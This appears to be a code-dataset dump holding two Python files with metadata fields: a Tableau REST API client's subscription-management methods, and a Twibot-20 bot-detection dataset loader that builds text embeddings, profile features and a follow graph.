SubscriptionMethods27(SubscriptionMethods): def __init__(self, rest_api_base: TableauRestApiBase27): self.rest_api_base = rest_api_base class SubscriptionMethods28(SubscriptionMethods27): def __init__(self, rest_api_base: TableauRestApiBase28): self.rest_api_base = rest_api_base class SubscriptionMethods30(SubscriptionMethods28): def __init__(self, rest_api_base: TableauRestApiBase30): self.rest_api_base = rest_api_base class SubscriptionMethods31(SubscriptionMethods30): def __init__(self, rest_api_base: TableauRestApiBase31): self.rest_api_base = rest_api_base class SubscriptionMethods32(SubscriptionMethods31): def __init__(self, rest_api_base: TableauRestApiBase32): self.rest_api_base = rest_api_base class SubscriptionMethods33(SubscriptionMethods32): def __init__(self, rest_api_base: TableauRestApiBase33): self.rest_api_base = rest_api_base class SubscriptionMethods34(SubscriptionMethods33): def __init__(self, rest_api_base: TableauRestApiBase34): self.rest_api_base = rest_api_base class SubscriptionMethods35(SubscriptionMethods34): def __init__(self, rest_api_base: TableauRestApiBase35): self.rest_api_base = rest_api_base def create_subscription(self, subscription_subject: Optional[str] = None, view_or_workbook: Optional[str] = None, content_name_or_luid: Optional[str] = None, schedule_name_or_luid: Optional[str] = None, username_or_luid: Optional[str] = None, project_name_or_luid: Optional[str] = None, wb_name_or_luid: Optional[str] = None, image_attachment: bool = True, pdf_attachment: bool = False, direct_xml_request: Optional[ET.Element] = None) -> str: self.start_log_block() if direct_xml_request is not None: tsr = direct_xml_request else: if view_or_workbook not in ['View', 'Workbook']: raise InvalidOptionException("view_or_workbook must be 'Workbook' or 'View'") user_luid = self.query_user_luid(username_or_luid) schedule_luid = self.query_schedule_luid(schedule_name_or_luid) if self.is_luid(content_name_or_luid): content_luid = content_name_or_luid else: if view_or_workbook == 'View': if wb_name_or_luid is None: raise InvalidOptionException('Must include wb_name_or_luid for a View name lookup') content_luid = self.query_workbook_view_luid(wb_name_or_luid, content_name_or_luid, proj_name_or_luid=project_name_or_luid, username_or_luid=user_luid) elif view_or_workbook == 'Workbook': content_luid = self.query_workbook_luid(content_name_or_luid, project_name_or_luid, user_luid) else: raise InvalidOptionException("view_or_workbook must be 'Workbook' or 'View'") tsr = ET.Element('tsRequest') s = ET.Element('subscription') s.set('subject', subscription_subject) s.set('attachImage', str(image_attachment).lower()) s.set('attachPdf', str(pdf_attachment).lower()) c = ET.Element('content') c.set('type', view_or_workbook) c.set('id', content_luid) sch = ET.Element('schedule') sch.set('id', schedule_luid) u = ET.Element('user') u.set('id', user_luid) s.append(c) s.append(sch) s.append(u) tsr.append(s) url = self.build_api_url('subscriptions') try: new_subscription = self.send_add_request(url, tsr) new_subscription_luid = new_subscription.findall('.//t:subscription', self.ns_map)[0].get("id") self.end_log_block() return new_subscription_luid except RecoverableHTTPException as e: self.end_log_block() raise e except HTTPError as e: self.end_log_block() raise InvalidOptionException('Please check to make sure that you have an SMTP server configured and Subscriptions are enabled for this Server and Site') def update_subscription(self, subscription_luid: str, subject: Optional[str] = None, schedule_luid: Optional[str] = None, image_attachment: Optional[bool] = None, pdf_attachment: Optional[bool] = None) -> ET.Element: if subject is None and schedule_luid is None: raise InvalidOptionException("You must pass one of subject or schedule_luid, or both") tsr = ET.Element('tsRequest') s = ET.Element('subscription') if subject is not None: s.set('subject', subject) if image_attachment is not None: s.set('attachImage', str(image_attachment).lower()) if pdf_attachment is not None: s.set('attachPdf', str(pdf_attachment).lower()) if schedule_luid is not None: sch = ET.Element('schedule') sch.set('id', schedule_luid) s.append(sch) tsr.append(s) url = self.build_api_url("subscriptions/{}".format(subscription_luid)) response = self.send_update_request(url, tsr) self.end_log_block() return response class SubscriptionMethods36(SubscriptionMethods35): def __init__(self, rest_api_base: TableauRestApiBase36): self.rest_api_base = rest_api_base
from requests.exceptions import HTTPError from .rest_api_base import * class SubscriptionMethods(): def __init__(self, rest_api_base: TableauRestApiBase): self.rest_api_base = rest_api_base def __getattr__(self, attr): return getattr(self.rest_api_base, attr) def query_subscriptions(self, username_or_luid: Optional[str] = None, schedule_name_or_luid: Optional[str] = None, subscription_subject: Optional[str] = None, view_or_workbook: Optional[str] = None, content_name_or_luid: Optional[str] = None, project_name_or_luid: Optional[str] = None, wb_name_or_luid: Optional[str] = None) -> ET.Element: self.start_log_block() subscriptions = self.query_resource('subscriptions') filters_dict = {} if subscription_subject is not None: filters_dict['subject'] = '[@subject="{}"]'.format(subscription_subject) if schedule_name_or_luid is not None: if self.is_luid(schedule_name_or_luid): filters_dict['sched'] = 'schedule[@id="{}"'.format(schedule_name_or_luid) else: filters_dict['sched'] = 'schedule[@user="{}"'.format(schedule_name_or_luid) if username_or_luid is not None: if self.is_luid(username_or_luid): filters_dict['user'] = 'user[@id="{}"]'.format(username_or_luid) else: filters_dict['user'] = 'user[@name="{}"]'.format(username_or_luid) if view_or_workbook is not None: if view_or_workbook not in ['View', 'Workbook']: raise InvalidOptionException("view_or_workbook must be 'Workbook' or 'View'") # Does this search make sense my itself? if content_name_or_luid is not None: if self.is_luid(content_name_or_luid): filters_dict['content_luid'] = 'content[@id="{}"'.format(content_name_or_luid) else: if view_or_workbook is None: raise InvalidOptionException('view_or_workbook must be specified for content: "Workbook" or "View"') if view_or_workbook == 'View': if wb_name_or_luid is None: raise InvalidOptionException('Must include wb_name_or_luid for a View name lookup') content_luid = self.query_workbook_view_luid(wb_name_or_luid, content_name_or_luid, proj_name_or_luid=project_name_or_luid) elif view_or_workbook == 'Workbook': content_luid = self.query_workbook_luid(content_name_or_luid, project_name_or_luid) filters_dict['content_luid'] = 'content[@id="{}"'.format(content_luid) if 'subject' in filters_dict: subscriptions = subscriptions.findall('.//t:subscription{}'.format(filters_dict['subject']), self.ns_map) if 'user' in filters_dict: subscriptions = subscriptions.findall('.//t:subscription/{}/..'.format(filters_dict['user']), self.ns_map) if 'sched' in filters_dict: subscriptions = subscriptions.findall('.//t:subscription/{}/..'.format(filters_dict['sched']), self.ns_map) if 'content_luid' in filters_dict: subscriptions = subscriptions.findall('.//t:subscription/{}/..'.format(filters_dict['content_luid']), self.ns_map) self.end_log_block() return subscriptions def create_subscription(self, subscription_subject: Optional[str] = None, view_or_workbook: Optional[str] = None, content_name_or_luid: Optional[str] = None, schedule_name_or_luid: Optional[str] = None, username_or_luid: Optional[str] = None, project_name_or_luid: Optional[str] = None, wb_name_or_luid: Optional[str] = None, direct_xml_request: Optional[ET.Element] = None) -> str: self.start_log_block() if direct_xml_request is not None: tsr = direct_xml_request else: if view_or_workbook not in ['View', 'Workbook']: raise InvalidOptionException("view_or_workbook must be 'Workbook' or 'View'") user_luid = self.query_user_luid(username_or_luid) schedule_luid = self.query_schedule_luid(schedule_name_or_luid) if self.is_luid(content_name_or_luid): content_luid = content_name_or_luid else: if view_or_workbook == 'View': if wb_name_or_luid is None: raise InvalidOptionException('Must include wb_name_or_luid for a View name lookup') content_luid = self.query_workbook_view_luid(wb_name_or_luid, content_name_or_luid, proj_name_or_luid=project_name_or_luid, username_or_luid=user_luid) elif view_or_workbook == 'Workbook': content_luid = self.query_workbook_luid(content_name_or_luid, project_name_or_luid, user_luid) else: raise InvalidOptionException("view_or_workbook must be 'Workbook' or 'View'") tsr = ET.Element('tsRequest') s = ET.Element('subscription') s.set('subject', subscription_subject) c = ET.Element('content') c.set('type', view_or_workbook) c.set('id', content_luid) sch = ET.Element('schedule') sch.set('id', schedule_luid) u = ET.Element('user') u.set('id', user_luid) s.append(c) s.append(sch) s.append(u) tsr.append(s) url = self.build_api_url('subscriptions') try: new_subscription = self.send_add_request(url, tsr) new_subscription_luid = new_subscription.findall('.//t:subscription', self.ns_map)[0].get("id") self.end_log_block() return new_subscription_luid except RecoverableHTTPException as e: self.end_log_block() raise e except HTTPError as e: self.end_log_block() raise InvalidOptionException('Please check to make sure that you have an SMTP server configured and Subscriptions are enabled for this Server and Site') def create_subscription_to_workbook(self, subscription_subject: str, wb_name_or_luid: str, schedule_name_or_luid: str, username_or_luid: str, project_name_or_luid: Optional[str] = None) -> str: self.start_log_block() luid = self.create_subscription(subscription_subject=subscription_subject, view_or_workbook='Workbook', content_name_or_luid=wb_name_or_luid, schedule_name_or_luid=schedule_name_or_luid, username_or_luid=username_or_luid, project_name_or_luid=project_name_or_luid) self.end_log_block() return luid def create_subscription_to_view(self, subscription_subject: str, view_name_or_luid: str, schedule_name_or_luid: str, username_or_luid: str, wb_name_or_luid: Optional[str] = None, project_name_or_luid: Optional[str] = None) -> str: self.start_log_block() luid = self.create_subscription(subscription_subject=subscription_subject, view_or_workbook='View', content_name_or_luid=view_name_or_luid, schedule_name_or_luid=schedule_name_or_luid, username_or_luid=username_or_luid, wb_name_or_luid=wb_name_or_luid, project_name_or_luid=project_name_or_luid) self.end_log_block() return luid def update_subscription(self, subscription_luid: str, subject: Optional[str] = None, schedule_luid: Optional[str] = None) -> ET.Element: if subject is None and schedule_luid is None: raise InvalidOptionException("You must pass one of subject or schedule_luid, or both") tsr = ET.Element('tsRequest') s = ET.Element('subscription') if subject is not None: s.set('subject', subject) if schedule_luid is not None: sch = ET.Element('schedule') sch.set('id', schedule_luid) s.append(sch) tsr.append(s) url = self.build_api_url("subscriptions/{}".format(subscription_luid)) response = self.send_update_request(url, tsr) self.end_log_block() return response def delete_subscriptions(self, subscription_luid_s: Union[List[str], str]): self.start_log_block() subscription_luids = self.to_list(subscription_luid_s) for subscription_luid in subscription_luids: url = self.build_api_url("subscriptions/{}".format(subscription_luid)) self.send_delete_request(url) self.end_log_block() class SubscriptionMethods27(SubscriptionMethods): def __init__(self, rest_api_base: TableauRestApiBase27): self.rest_api_base = rest_api_base class SubscriptionMethods28(SubscriptionMethods27): def __init__(self, rest_api_base: TableauRestApiBase28): self.rest_api_base = rest_api_base class SubscriptionMethods30(SubscriptionMethods28): def __init__(self, rest_api_base: TableauRestApiBase30): self.rest_api_base = rest_api_base class SubscriptionMethods31(SubscriptionMethods30): def __init__(self, rest_api_base: TableauRestApiBase31): self.rest_api_base = rest_api_base class SubscriptionMethods32(SubscriptionMethods31): def __init__(self, rest_api_base: TableauRestApiBase32): self.rest_api_base = rest_api_base class SubscriptionMethods33(SubscriptionMethods32): def __init__(self, rest_api_base: TableauRestApiBase33): self.rest_api_base = rest_api_base class SubscriptionMethods34(SubscriptionMethods33): def __init__(self, rest_api_base: TableauRestApiBase34): self.rest_api_base = rest_api_base class SubscriptionMethods35(SubscriptionMethods34): def __init__(self, rest_api_base: TableauRestApiBase35): self.rest_api_base = rest_api_base def create_subscription(self, subscription_subject: Optional[str] = None, view_or_workbook: Optional[str] = None, content_name_or_luid: Optional[str] = None, schedule_name_or_luid: Optional[str] = None, username_or_luid: Optional[str] = None, project_name_or_luid: Optional[str] = None, wb_name_or_luid: Optional[str] = None, image_attachment: bool = True, pdf_attachment: bool = False, direct_xml_request: Optional[ET.Element] = None) -> str: self.start_log_block() if direct_xml_request is not None: tsr = direct_xml_request else: if view_or_workbook not in ['View', 'Workbook']: raise InvalidOptionException("view_or_workbook must be 'Workbook' or 'View'") user_luid = self.query_user_luid(username_or_luid) schedule_luid = self.query_schedule_luid(schedule_name_or_luid) if self.is_luid(content_name_or_luid): content_luid = content_name_or_luid else: if view_or_workbook == 'View': if wb_name_or_luid is None: raise InvalidOptionException('Must include wb_name_or_luid for a View name lookup') content_luid = self.query_workbook_view_luid(wb_name_or_luid, content_name_or_luid, proj_name_or_luid=project_name_or_luid, username_or_luid=user_luid) elif view_or_workbook == 'Workbook': content_luid = self.query_workbook_luid(content_name_or_luid, project_name_or_luid, user_luid) else: raise InvalidOptionException("view_or_workbook must be 'Workbook' or 'View'") tsr = ET.Element('tsRequest') s = ET.Element('subscription') s.set('subject', subscription_subject) s.set('attachImage', str(image_attachment).lower()) s.set('attachPdf', str(pdf_attachment).lower()) c = ET.Element('content') c.set('type', view_or_workbook) c.set('id', content_luid) sch = ET.Element('schedule') sch.set('id', schedule_luid) u = ET.Element('user') u.set('id', user_luid) s.append(c) s.append(sch) s.append(u) tsr.append(s) url = self.build_api_url('subscriptions') try: new_subscription = self.send_add_request(url, tsr) new_subscription_luid = new_subscription.findall('.//t:subscription', self.ns_map)[0].get("id") self.end_log_block() return new_subscription_luid except RecoverableHTTPException as e: self.end_log_block() raise e except HTTPError as e: self.end_log_block() raise InvalidOptionException('Please check to make sure that you have an SMTP server configured and Subscriptions are enabled for this Server and Site') def update_subscription(self, subscription_luid: str, subject: Optional[str] = None, schedule_luid: Optional[str] = None, image_attachment: Optional[bool] = None, pdf_attachment: Optional[bool] = None) -> ET.Element: if subject is None and schedule_luid is None: raise InvalidOptionException("You must pass one of subject or schedule_luid, or both") tsr = ET.Element('tsRequest') s = ET.Element('subscription') if subject is not None: s.set('subject', subject) if image_attachment is not None: s.set('attachImage', str(image_attachment).lower()) if pdf_attachment is not None: s.set('attachPdf', str(pdf_attachment).lower()) if schedule_luid is not None: sch = ET.Element('schedule') sch.set('id', schedule_luid) s.append(sch) tsr.append(s) url = self.build_api_url("subscriptions/{}".format(subscription_luid)) response = self.send_update_request(url, tsr) self.end_log_block() return response class SubscriptionMethods36(SubscriptionMethods35): def __init__(self, rest_api_base: TableauRestApiBase36): self.rest_api_base = rest_api_base
en
0.810768
# Does this search make sense my itself?
2.306672
2
Dataset.py
leopoldwhite/BotRGCN
1
6627894
<filename>Dataset.py import torch import numpy as np import pandas as pd import json import os from transformers import pipeline from datetime import datetime as dt from torch.utils.data import Dataset class Twibot20(Dataset): def __init__(self,root='./Data/',device='cpu',process=True,save=True): self.root = root self.device = device if process: print('Loading train.json') df_train=pd.read_json('./Twibot-20/train.json') print('Loading test.json') df_test=pd.read_json('./Twibot-20/test.json') print('Loading support.json') df_support=pd.read_json('./Twibot-20/support.json') print('Loading dev.json') df_dev=pd.read_json('./Twibot-20/dev.json') print('Finished') df_train=df_train.iloc[:,[0,1,2,3,5]] df_test=df_test.iloc[:,[0,1,2,3,5]] df_support=df_support.iloc[:,[0,1,2,3]] df_dev=df_dev.iloc[:,[0,1,2,3,5]] df_support['label']='None' self.df_data_labeled=pd.concat([df_train,df_dev,df_test],ignore_index=True) self.df_data=pd.concat([df_train,df_dev,df_test,df_support],ignore_index=True) self.df_data=self.df_data self.df_data_labeled=self.df_data_labeled self.save=save def load_labels(self): print('Loading labels...',end=' ') path=self.root+'label.pt' if not os.path.exists(path): labels=torch.LongTensor(self.df_data_labeled['label']).to(self.device) if self.save: torch.save(labels,'./Data/label.pt') else: labels=torch.load(self.root+"label.pt").to(self.device) print('Finished') return labels def Des_Preprocess(self): print('Loading raw feature1...',end=' ') path=self.root+'description.npy' if not os.path.exists(path): description=[] for i in range (self.df_data.shape[0]): if self.df_data['profile'][i] is None or self.df_data['profile'][i]['description'] is None: description.append('None') else: description.append(self.df_data['profile'][i]['description']) description=np.array(description) if self.save: np.save(path,description) else: description=np.load(path,allow_pickle=True) print('Finished') return description def Des_embbeding(self): print('Running feature1 embedding') path=self.root+"des_tensor.pt" if not os.path.exists(path): description=np.load(self.root+'description.npy',allow_pickle=True) print('Loading RoBerta') feature_extraction = pipeline('feature-extraction', model="distilroberta-base", tokenizer="distilroberta-base",device=0) des_vec=[] for (j,each) in enumerate(description): feature=torch.Tensor(feature_extraction(each)) for (i,tensor) in enumerate(feature[0]): if i==0: feature_tensor=tensor else: feature_tensor+=tensor feature_tensor/=feature.shape[1] des_vec.append(feature_tensor) if (j%1000==0): print('[{:>6d}/229580]'.format(j+1)) des_tensor=torch.stack(des_vec,0).to(self.device) if self.save: torch.save(des_tensor,'./Data/des_tensor.pt') else: des_tensor=torch.load(self.root+"des_tensor.pt").to(self.device) print('Finished') return des_tensor def tweets_preprocess(self): print('Loading raw feature2...',end=' ') path=self.root+'tweets.npy' if not os.path.exists(path): tweets=[] for i in range (self.df_data.shape[0]): one_usr_tweets=[] if self.df_data['tweet'][i] is None: one_usr_tweets.append('') else: for each in self.df_data['tweet'][i]: one_usr_tweets.append(each) tweets.append(one_usr_tweets) tweets=np.array(tweets) if self.save: np.save(path,tweets) else: tweets=np.load(path,allow_pickle=True) print('Finished') return tweets def tweets_embedding(self): print('Running feature2 embedding') path=self.root+"tweets_tensor.pt" if not os.path.exists(path): tweets=np.load("./Data/tweets.npy",allow_pickle=True) print('Loading RoBerta') feature_extract=pipeline('feature-extraction',model='roberta-base',tokenizer='roberta-base',device=0,padding=True, truncation=True,max_length=500, add_special_tokens = True) tweets_list=[] for i,each_person_tweets in enumerate(tweets): for j,each_tweet in enumerate(each_person_tweets): each_tweet_tensor=torch.tensor(feature_extract(each_tweet)) for k,each_word_tensor in enumerate(each_tweet_tensor[0]): if k==0: total_word_tensor=each_word_tensor else: total_word_tensor+=each_word_tensor total_word_tensor/=each_tweet_tensor.shape[1] if j==0: total_each_person_tweets=total_word_tensor elif j==10: break else: total_each_person_tweets+=total_word_tensor if j==10: total_each_person_tweets/=10 else: total_each_person_tweets/=len(each_person_tweets) tweets_list.append(total_each_person_tweets) if (i%500==0): print('[{:>6d}/229580]'.format(i+1)) tweet_tensor=torch.stack(tweets_list).to(self.device) if self.save: torch.save(tweet_tensor,path) else: tweets_tensor=torch.load(self.root+"tweets_tensor.pt").to(self.device) print('Finished') return tweets_tensor def num_prop_preprocess(self): print('Processing feature3...',end=' ') path0=self.root+'num_prop.pt' if not os.path.exists(path0): path=self.root if not os.path.exists(path+"followers_count.pt"): followers_count=[] for i in range (self.df_data.shape[0]): if self.df_data['profile'][i] is None or self.df_data['profile'][i]['followers_count'] is None: followers_count.append(0) else: followers_count.append(self.df_data['profile'][i]['followers_count']) followers_count=torch.tensor(np.array(followers_count,dtype=np.float32)).to(self.device) if self.save: torch.save(followers_count,path+"followers_count.pt") friends_count=[] for i in range (self.df_data.shape[0]): if self.df_data['profile'][i] is None or self.df_data['profile'][i]['friends_count'] is None: friends_count.append(0) else: friends_count.append(self.df_data['profile'][i]['friends_count']) friends_count=torch.tensor(np.array(friends_count,dtype=np.float32)).to(self.device) if self.save: torch.save(friends_count,path+'friends_count.pt') screen_name_length=[] for i in range (self.df_data.shape[0]): if self.df_data['profile'][i] is None or self.df_data['profile'][i]['screen_name'] is None: screen_name_length.append(0) else: screen_name_length.append(len(self.df_data['profile'][i]['screen_name'])) screen_name_length=torch.tensor(np.array(screen_name_length,dtype=np.float32)).to(self.device) if self.save: torch.save(screen_name_length,path+'screen_name_length.pt') favourites_count=[] for i in range (self.df_data.shape[0]): if self.df_data['profile'][i] is None or self.df_data['profile'][i]['favourites_count'] is None: favourites_count.append(0) else: favourites_count.append(self.df_data['profile'][i]['favourites_count']) favourites_count=torch.tensor(np.array(favourites_count,dtype=np.float32)).to(self.device) if self.save: torch.save(favourites_count,path+'favourites_count.pt') active_days=[] date0=dt.strptime('Tue Sep 1 00:00:00 +0000 2020 ','%a %b %d %X %z %Y ') for i in range (self.df_data.shape[0]): if self.df_data['profile'][i] is None or self.df_data['profile'][i]['created_at'] is None: active_days.append(0) else: date=dt.strptime(self.df_data['profile'][i]['created_at'],'%a %b %d %X %z %Y ') active_days.append((date0-date).days) active_days=torch.tensor(np.array(active_days,dtype=np.float32)).to(self.device) if self.save: torch.save(active_days,path+'active_days.pt') statuses_count=[] for i in range (self.df_data.shape[0]): if self.df_data['profile'][i] is None or self.df_data['profile'][i]['statuses_count'] is None: statuses_count.append(0) else: statuses_count.append(int(self.df_data['profile'][i]['statuses_count'])) statuses_count=torch.tensor(np.array(statuses_count,dtype=np.float32)).to(self.device) if self.save: torch.save(statuses_count,path+'statuses_count.pt') else: active_days=torch.load(path+"active_days.pt") screen_name_length=torch.load(path+"screen_name_length.pt") favourites_count=torch.load(path+"favourites_count.pt") followers_count=torch.load(path+"followers_count.pt") friends_count=torch.load(path+"friends_count.pt") statuses_count=torch.load(path+"statuses_count.pt") active_days=pd.Series(active_days.to('cpu').detach().numpy()) active_days=(active_days-active_days.mean())/active_days.std() active_days=torch.tensor(np.array(active_days)) screen_name_length=pd.Series(screen_name_length.to('cpu').detach().numpy()) screen_name_length_days=(screen_name_length-screen_name_length.mean())/screen_name_length.std() screen_name_length_days=torch.tensor(np.array(screen_name_length_days)) favourites_count=pd.Series(favourites_count.to('cpu').detach().numpy()) favourites_count=(favourites_count-favourites_count.mean())/favourites_count.std() favourites_count=torch.tensor(np.array(favourites_count)) followers_count=pd.Series(followers_count.to('cpu').detach().numpy()) followers_count=(followers_count-followers_count.mean())/followers_count.std() followers_count=torch.tensor(np.array(followers_count)) friends_count=pd.Series(friends_count.to('cpu').detach().numpy()) friends_count=(friends_count-friends_count.mean())/friends_count.std() friends_count=torch.tensor(np.array(friends_count)) statuses_count=pd.Series(statuses_count.to('cpu').detach().numpy()) statuses_count=(statuses_count-statuses_count.mean())/statuses_count.std() statuses_count=torch.tensor(np.array(statuses_count)) num_prop=torch.cat((followers_count.reshape([229580,1]),friends_count.reshape([229580,1]),favourites_count.reshape([229580,1]),statuses_count.reshape([229580,1]),screen_name_length_days.reshape([229580,1]),active_days.reshape([229580,1])),1).to(self.device) if self.save: torch.save(num_prop,"./Data/num_prop.pt") else: num_prop=torch.load(self.root+"num_prop.pt").to(self.device) print('Finished') return num_prop def cat_prop_preprocess(self): print('Processing feature4...',end=' ') path=self.root+'category_properties.pt' if not os.path.exists(path): category_properties=[] properties=['protected','geo_enabled','verified','contributors_enabled','is_translator','is_translation_enabled','profile_background_tile','profile_use_background_image','has_extended_profile','default_profile','default_profile_image'] for i in range (self.df_data.shape[0]): prop=[] if self.df_data['profile'][i] is None: for i in range(11): prop.append(0) else: for each in properties: if self.df_data['profile'][i][each] is None: prop.append(0) else: if self.df_data['profile'][i][each] == "True ": prop.append(1) else: prop.append(0) prop=np.array(prop) category_properties.append(prop) category_properties=torch.tensor(np.array(category_properties,dtype=np.float32)).to(self.device) if self.save: torch.save(category_properties,self.root+'category_properties.pt') else: category_properties=torch.load(self.root+"category_properties.pt").to(self.device) print('Finished') return category_properties def Build_Graph(self): print('Building graph',end=' ') path=self.root+'edge_index.pt' if not os.path.exists(path): id2index_dict={id:index for index,id in enumerate(self.df_data['ID'])} edge_index=[] edge_type=[] for i,relation in enumerate(self.df_data['neighbor']): if relation is not None: for each_id in relation['following']: try: target_id=id2index_dict[int(each_id)] except KeyError: continue else: edge_index.append([i,target_id]) edge_type.append(0) for each_id in relation['follower']: try: target_id=id2index_dict[int(each_id)] except KeyError: continue else: edge_index.append([i,target_id]) edge_type.append(1) else: continue edge_index=torch.tensor(edge_index,dtype=torch.long).t().contiguous().to(self.device) edge_type=torch.tensor(edge_type,dtype=torch.long).to(self.device) if self.save: torch.save(edge_index,self.root+"edge_index.pt") torch.save(edge_type,self.root+"edge_type.pt") else: edge_index=torch.load(self.root+"edge_index.pt").to(self.device) edge_type=torch.load(self.root+"edge_type.pt").to(self.device) print('Finished') return edge_index,edge_type def train_val_test_mask(self): train_idx=range(8278) val_idx=range(8278,8278+2365) test_idx=range(8278+2365,8278+2365+1183) return train_idx,val_idx,test_idx def dataloader(self): labels=self.load_labels() self.Des_Preprocess() des_tensor=self.Des_embbeding() self.tweets_preprocess() tweets_tensor=self.tweets_embedding() num_prop=self.num_prop_preprocess() category_prop=self.cat_prop_preprocess() edge_index,edge_type=self.Build_Graph() train_idx,val_idx,test_idx=self.train_val_test_mask() return des_tensor,tweets_tensor,num_prop,category_prop,edge_index,edge_type,labels,train_idx,val_idx,test_idx
<filename>Dataset.py import torch import numpy as np import pandas as pd import json import os from transformers import pipeline from datetime import datetime as dt from torch.utils.data import Dataset class Twibot20(Dataset): def __init__(self,root='./Data/',device='cpu',process=True,save=True): self.root = root self.device = device if process: print('Loading train.json') df_train=pd.read_json('./Twibot-20/train.json') print('Loading test.json') df_test=pd.read_json('./Twibot-20/test.json') print('Loading support.json') df_support=pd.read_json('./Twibot-20/support.json') print('Loading dev.json') df_dev=pd.read_json('./Twibot-20/dev.json') print('Finished') df_train=df_train.iloc[:,[0,1,2,3,5]] df_test=df_test.iloc[:,[0,1,2,3,5]] df_support=df_support.iloc[:,[0,1,2,3]] df_dev=df_dev.iloc[:,[0,1,2,3,5]] df_support['label']='None' self.df_data_labeled=pd.concat([df_train,df_dev,df_test],ignore_index=True) self.df_data=pd.concat([df_train,df_dev,df_test,df_support],ignore_index=True) self.df_data=self.df_data self.df_data_labeled=self.df_data_labeled self.save=save def load_labels(self): print('Loading labels...',end=' ') path=self.root+'label.pt' if not os.path.exists(path): labels=torch.LongTensor(self.df_data_labeled['label']).to(self.device) if self.save: torch.save(labels,'./Data/label.pt') else: labels=torch.load(self.root+"label.pt").to(self.device) print('Finished') return labels def Des_Preprocess(self): print('Loading raw feature1...',end=' ') path=self.root+'description.npy' if not os.path.exists(path): description=[] for i in range (self.df_data.shape[0]): if self.df_data['profile'][i] is None or self.df_data['profile'][i]['description'] is None: description.append('None') else: description.append(self.df_data['profile'][i]['description']) description=np.array(description) if self.save: np.save(path,description) else: description=np.load(path,allow_pickle=True) print('Finished') return description def Des_embbeding(self): print('Running feature1 embedding') path=self.root+"des_tensor.pt" if not os.path.exists(path): description=np.load(self.root+'description.npy',allow_pickle=True) print('Loading RoBerta') feature_extraction = pipeline('feature-extraction', model="distilroberta-base", tokenizer="distilroberta-base",device=0) des_vec=[] for (j,each) in enumerate(description): feature=torch.Tensor(feature_extraction(each)) for (i,tensor) in enumerate(feature[0]): if i==0: feature_tensor=tensor else: feature_tensor+=tensor feature_tensor/=feature.shape[1] des_vec.append(feature_tensor) if (j%1000==0): print('[{:>6d}/229580]'.format(j+1)) des_tensor=torch.stack(des_vec,0).to(self.device) if self.save: torch.save(des_tensor,'./Data/des_tensor.pt') else: des_tensor=torch.load(self.root+"des_tensor.pt").to(self.device) print('Finished') return des_tensor def tweets_preprocess(self): print('Loading raw feature2...',end=' ') path=self.root+'tweets.npy' if not os.path.exists(path): tweets=[] for i in range (self.df_data.shape[0]): one_usr_tweets=[] if self.df_data['tweet'][i] is None: one_usr_tweets.append('') else: for each in self.df_data['tweet'][i]: one_usr_tweets.append(each) tweets.append(one_usr_tweets) tweets=np.array(tweets) if self.save: np.save(path,tweets) else: tweets=np.load(path,allow_pickle=True) print('Finished') return tweets def tweets_embedding(self): print('Running feature2 embedding') path=self.root+"tweets_tensor.pt" if not os.path.exists(path): tweets=np.load("./Data/tweets.npy",allow_pickle=True) print('Loading RoBerta') feature_extract=pipeline('feature-extraction',model='roberta-base',tokenizer='roberta-base',device=0,padding=True, truncation=True,max_length=500, add_special_tokens = True) tweets_list=[] for i,each_person_tweets in enumerate(tweets): for j,each_tweet in enumerate(each_person_tweets): each_tweet_tensor=torch.tensor(feature_extract(each_tweet)) for k,each_word_tensor in enumerate(each_tweet_tensor[0]): if k==0: total_word_tensor=each_word_tensor else: total_word_tensor+=each_word_tensor total_word_tensor/=each_tweet_tensor.shape[1] if j==0: total_each_person_tweets=total_word_tensor elif j==10: break else: total_each_person_tweets+=total_word_tensor if j==10: total_each_person_tweets/=10 else: total_each_person_tweets/=len(each_person_tweets) tweets_list.append(total_each_person_tweets) if (i%500==0): print('[{:>6d}/229580]'.format(i+1)) tweet_tensor=torch.stack(tweets_list).to(self.device) if self.save: torch.save(tweet_tensor,path) else: tweets_tensor=torch.load(self.root+"tweets_tensor.pt").to(self.device) print('Finished') return tweets_tensor def num_prop_preprocess(self): print('Processing feature3...',end=' ') path0=self.root+'num_prop.pt' if not os.path.exists(path0): path=self.root if not os.path.exists(path+"followers_count.pt"): followers_count=[] for i in range (self.df_data.shape[0]): if self.df_data['profile'][i] is None or self.df_data['profile'][i]['followers_count'] is None: followers_count.append(0) else: followers_count.append(self.df_data['profile'][i]['followers_count']) followers_count=torch.tensor(np.array(followers_count,dtype=np.float32)).to(self.device) if self.save: torch.save(followers_count,path+"followers_count.pt") friends_count=[] for i in range (self.df_data.shape[0]): if self.df_data['profile'][i] is None or self.df_data['profile'][i]['friends_count'] is None: friends_count.append(0) else: friends_count.append(self.df_data['profile'][i]['friends_count']) friends_count=torch.tensor(np.array(friends_count,dtype=np.float32)).to(self.device) if self.save: torch.save(friends_count,path+'friends_count.pt') screen_name_length=[] for i in range (self.df_data.shape[0]): if self.df_data['profile'][i] is None or self.df_data['profile'][i]['screen_name'] is None: screen_name_length.append(0) else: screen_name_length.append(len(self.df_data['profile'][i]['screen_name'])) screen_name_length=torch.tensor(np.array(screen_name_length,dtype=np.float32)).to(self.device) if self.save: torch.save(screen_name_length,path+'screen_name_length.pt') favourites_count=[] for i in range (self.df_data.shape[0]): if self.df_data['profile'][i] is None or self.df_data['profile'][i]['favourites_count'] is None: favourites_count.append(0) else: favourites_count.append(self.df_data['profile'][i]['favourites_count']) favourites_count=torch.tensor(np.array(favourites_count,dtype=np.float32)).to(self.device) if self.save: torch.save(favourites_count,path+'favourites_count.pt') active_days=[] date0=dt.strptime('Tue Sep 1 00:00:00 +0000 2020 ','%a %b %d %X %z %Y ') for i in range (self.df_data.shape[0]): if self.df_data['profile'][i] is None or self.df_data['profile'][i]['created_at'] is None: active_days.append(0) else: date=dt.strptime(self.df_data['profile'][i]['created_at'],'%a %b %d %X %z %Y ') active_days.append((date0-date).days) active_days=torch.tensor(np.array(active_days,dtype=np.float32)).to(self.device) if self.save: torch.save(active_days,path+'active_days.pt') statuses_count=[] for i in range (self.df_data.shape[0]): if self.df_data['profile'][i] is None or self.df_data['profile'][i]['statuses_count'] is None: statuses_count.append(0) else: statuses_count.append(int(self.df_data['profile'][i]['statuses_count'])) statuses_count=torch.tensor(np.array(statuses_count,dtype=np.float32)).to(self.device) if self.save: torch.save(statuses_count,path+'statuses_count.pt') else: active_days=torch.load(path+"active_days.pt") screen_name_length=torch.load(path+"screen_name_length.pt") favourites_count=torch.load(path+"favourites_count.pt") followers_count=torch.load(path+"followers_count.pt") friends_count=torch.load(path+"friends_count.pt") 